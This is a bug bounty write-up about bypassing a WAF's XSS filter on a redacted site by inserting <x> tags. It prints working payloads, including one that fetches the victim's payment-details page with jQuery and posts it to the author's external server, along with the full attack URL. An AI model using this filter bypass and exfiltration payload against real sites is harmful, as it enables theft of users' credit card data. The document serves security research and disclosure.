Bypassing XSS filter and Stealing User Payment Data
So here is another writeup about how I bypassed XSS filter and created a payload to get user credit card data. It was a private program on bugcrowd, let’s just say it was named Redact.
Here is the URL https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue=XSS The parameter searchValue was reflected inside an input feild.
So by putting an “ I was able to break out of the input field, after that, I tried the most basic payload “><script>alert(1)</script>, but unfortunately my request was blocked by WAF. so I tried another payload “onmouseover=alert(1) and again my request was blocked by WAF.
After some playing around, I found out that anything between <> was being removed, so if type something like this “o<x>nmouseover=alert<x>1//
<x> will be removed leaving it only with “onmouseover=alert(1)// and finally i was able to pop up a XSS.
Now there was a page which allows the user to view their payment Data https://www.redact.com/us/en/smbpro/my-account/payment-details, so I thought it would be a good idea to include this in my report that how I can get users credit card data with this XSS.
So the Payload for stealing user credit card data was this “o<x>nmouseover=$.get<x>(‘https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//
As the page was using jQuery, I requested the whole payment data page with $.get() and posted the page content to my server with $.post(), so now with this payload, I was able to get users payment data:
https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue=“o<x>nmouseover=$.get<x>(‘https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//
Clik here to view.
But unfortunately, my report got duplicate.
Clik here to view.
Thank You for Reading.
Image may be NSFW.Clik here to view.
